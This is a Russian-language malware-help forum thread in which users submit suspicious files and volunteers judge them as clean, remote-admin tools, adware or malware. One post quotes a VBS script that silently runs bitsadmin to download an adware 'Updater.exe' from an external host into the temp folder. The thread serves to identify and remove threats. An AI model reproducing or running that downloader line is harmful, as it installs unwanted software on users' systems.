Ответ на вопрос: Вирус или нет?

**mike 1** · 29.04.2015, 00:22

C:\Program Files (x86)\Opera\launcher.exe - чистый.
C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe - чистый
C:\Program Files\WindowsApps\Microsoft.SkypeApp_3.1.0.1007_x8 6__kzf8qxf38zg5c\LibWrap.dll - чистый
C:\windows\SYSTEM32\sysfiles\msimg32.dll - чистый
C:\windows\SYSTEM32\sysfiles\oledlg.dll - чистый
C:\windows\syswow64\sysfiles\rfusclient.exe, C:\windows\syswow64\sysfiles\rutserv.exe - not-a-virus:RemoteAdmin.Win32.Agent.lq (от программы удаленного доступа Radmin)

...

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

**Userik** · 29.04.2015, 00:41

Сообщение от mike 1

...

Вот эти файлы C:\windows\syswow64\sysfiles\rfusclient.exe, C:\windows\syswow64\sysfiles\rutserv.exe появились после установки "активатора офиса"
Просто удалить наверное мало?

**regist** · 29.04.2015, 09:53

Сообщение от Userik

Вот эти файлы C:\windows\syswow64\sysfiles\rfusclient.exe, C:\windows\syswow64\sysfiles\rutserv.exe появились после установки "активатора офиса"

значит, кто-то теперь имеет удалённый доступ к вашей системе.

Сообщение от Userik

Просто удалить наверное мало?

http://virusinfo.info/showthread.php?t=1235

**rustorkan** · 15.05.2015, 20:16

Файл сохранён как 150515_211536_virus_555629b8178d2.zip
Размер файла 4537931
MD5 f7b9ebb092e4d1ed46a31530a955f434

**Userik** · 19.05.2015, 05:51

Файл сохранён как 150519_064934_virusinfo_auto_MIR_555aa4beaec7d.zip
Размер файла 60675520
MD5 b01ce9069272ae9d1809775af4f36760

**regist** · 19.05.2015, 09:38

Userik, для файлов типа

Сообщение от Userik

150519_064934_virusinfo_auto_MIR_555aa4beaec7d.zip

вот эта процедура http://virusinfo.info/content.php?r=290-virus-detector
там же вы сами можете увидеть отчёт по файлам. Файлы в архиве чистые.

**Tommy Vercetti** · 08.06.2015, 10:40

Здравствуйте!
Полезная прожка 10-Strike Connection Monitor Pro, но:
213frcds.jpg
Ваш вердикт и советы, пожалуйста?

P.S. Да, да, крякнутая...
P.P.S. Ложное срабатывание ввиду особенностей работы этой программы?

**cvsdfvgsd** · 09.08.2015, 21:47

Файл сохранён как 150809_224109_run_55c79ec58c0c5.zip
Размер файла 48498
MD5 550e5a49a13a21141443bcb6e05d9bfe

скажите пожалуйста, какой вред может нанести этот файл, и как этого избежать можно, при этом не удаляя сам файл? без него нельзя игру запустить

**mike 1** · 09.08.2015, 22:36

Ваш вердикт и советы, пожалуйста?

А вы файл загружали?

скажите пожалуйста, какой вред может нанести этот файл, и как этого избежать можно, при этом не удаляя сам файл? без него нельзя игру запустить

Это не вирус, но эта программа может выполнять скрытно другие файлы, например какой-нибудь батник.

**cvsdfvgsd** · 09.08.2015, 22:44

Сообщение от mike 1

А вы файл загружали?

Это не вирус, но эта программа может выполнять скрытно другие файлы, например какой-нибудь батник.

а как узнать о том, действует ли она скрытно или нет?

**mike 1** · 09.08.2015, 23:13

Сообщение от cvsdfvgsd

а как узнать о том, действует ли она скрытно или нет?

Создайте свою тему с логами в разделе Помогите.

**cvsdfvgsd** · 13.08.2015, 09:12

по идее, апдейтер для игры. скажите пожалуйста, есть ли там вирусы?

Файл сохранён как 150813_100928_virus_55cc349895dd9.zip
Размер файла 934131
MD5 a5ef5cfb560fe1a6ec14d4665a10d62a

**MihailKrasnodar** · 29.08.2015, 22:17

Drweb нашёл файл C:/task.vbs

содержимое файла:
Set WshShell = CreateObject("WScript.Shell")
cmds=WshShell.RUN("bitsadmin /transfer amijob /download /priority high %TEMP%/Updater.exe",0, True)
Set WshShell = Nothing

Результаты проверки: https://www.virustotal.com/ru/file/d...is/1440875485/

Это вирус?

**Val_Ery** · 30.08.2015, 07:06

Сообщение от MihailKrasnodar

Drweb нашёл файл C:/task.vbs

содержимое файла:
Set WshShell = CreateObject("WScript.Shell")
cmds=WshShell.RUN("bitsadmin /transfer amijob /download /priority high //cds.d5v5w7m8.hwcdn.net/run/Updater.exe %TEMP%/Updater.exe",0, True)
Set WshShell = Nothing

Результаты проверки: https://www.virustotal.com/ru/file/d...is/1440875485/

Это вирус?

Не, не вирус... Сей скрипт всего лишь загружает ту фигню, что в Вашем посте зовется апдейтер.экзе.
А вот уже сам апдейтер - это вот что: тык - потенциально нежелательная программа, предназначенная для показа рекламы в браузерах, отображения модифицированных страниц, открытия доп. вкладок и т.п.

Поищите в папках для временных файлов этот апдейтер. Может уже загрузился...

P.S. Будьте добры, потрите ссылку на updater в тексте. Вдруг кто тыкнет случайно

**Adanedhel** · 09.10.2015, 17:37

Файл сохранён как 151009_183645_JLRPatch_EN_5617d0fdd6bbc.zip
Размер файла 2770339
MD5 ea281b8b6495fcfc666465ba1f241cd2

**Adanedhel** · 14.10.2015, 11:23

Что с темой?

**olejah** · 14.10.2015, 19:17

Сообщение от Adanedhel

Файл сохранён как 151009_183645_JLRPatch_EN_5617d0fdd6bbc.zip
Размер файла 2770339
MD5 ea281b8b6495fcfc666465ba1f241cd2

Зловред.

**xuim** · 16.10.2015, 17:04

Файл сохранён как 151016_175501_virus_562101b56a283.zip
Размер файла 820669
MD5 06f1015d556beea817dce0fb636f9e7c

**mike 1** · 16.10.2015, 18:18

Сообщение от xuim

Файл сохранён как 151016_175501_virus_562101b56a283.zip
Размер файла 820669
MD5 06f1015d556beea817dce0fb636f9e7c

Заражен. Рекламное ПО.

**Adanedhel** · 24.10.2015, 21:56

Файл сохранён как 151024_225557_virus_562bd43db5a7a.zip
Размер файла 731023
MD5 3faf4b6da9ab726661654266b09620f2

Ответ на вопрос: Вирус или нет?

Опции темы

Это понравилось:

Это понравилось:

Похожие темы

Помогите пожалуйста,и если можно, дайте ответ до 5 вечера,вирус жопаринеза версия 2.0

Найден ответ на вопрос "Если ты такой умный, почему такой бедный?"

Метки для этой темы

Ваши права в разделе